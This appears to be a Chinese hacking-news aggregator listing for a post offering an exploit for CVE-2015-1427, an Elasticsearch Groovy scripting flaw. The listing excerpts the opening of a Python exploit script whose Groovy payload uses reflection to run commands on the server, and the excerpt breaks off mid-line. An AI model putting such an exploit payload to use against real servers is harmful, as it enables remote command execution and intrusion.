记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Elasticsearch Groovy任意命令执行漏洞EXP

Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427) #!/usr/bin/env python import urllib import urllib2 import json import sys def execute(url,command): parameters = {"size":1, "script_fields": {"iswin": {"script":"java.lang.Math.class.forName("java.io.BufferedReader").getConstructor(java.io.Reader.class). newInstance(java.lang.Math.class.forName("java.io.Inp
发布时间:2015-03-05 12:35 | 阅读:140709 | 评论:0 | 标签:系统安全 Elasticsearch exp Elasticsearch漏洞 exp 漏洞

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云